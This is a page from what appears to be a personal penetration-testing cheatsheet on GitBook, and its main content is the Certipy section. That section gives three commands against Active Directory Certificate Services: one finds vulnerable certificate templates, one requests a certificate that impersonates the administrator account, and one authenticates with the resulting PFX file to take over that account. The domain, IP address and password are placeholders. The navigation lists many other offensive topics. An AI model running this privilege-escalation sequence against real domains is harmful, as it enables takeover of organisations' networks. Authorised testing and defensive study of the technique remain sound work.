Cheatsheet
  • Documentation
  • Nmap
  • Ffuf
  • FTP
  • SMB
  • RPC
  • NFS
  • DNS
  • SMTP
  • IMAP / POP3
  • SNMP
  • SQL
  • Rsync
  • Certipy
  • CrackMapExec
  • Transferring Files
  • Windows Remote Management
  • Windows AV
  • Wordpress
  • Infrastructure Enumeration
  • Privilege Escalation
  • Docker Breakout
  • Shells
  • SSTI
  • XSS
  • Pivot
    • SSH Tunneling
    • Chisel
    • Ligolo-ng
    • Meterpreter
  • LDAP
  • Spray
  • Antivirus / EDR
  • Impacket
  • Bloodhound
  • Powershell
  • Kerberosting
  • Password Attacks
  • Command Injections
  • Sliver C2
  • Windows credentials
  • Windows persistance
  • VSCode Debug
Powered by GitBook
On this page

Certipy

certipy find -vulnerable -stdout -u "qu35t@qu35t.pw" -dc-ip 10.10.10.10 -p "Password123"
certipy req -u "qu35t@qu35t.pw" -p 'Password123' -target 'dc.qu35t.pw' -template BasicAuthentication -ca 'qu35t-DC-CA' -upn 'administrator@qu35t.pw'
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
PreviousRsyncNextCrackMapExec

Last updated 2 years ago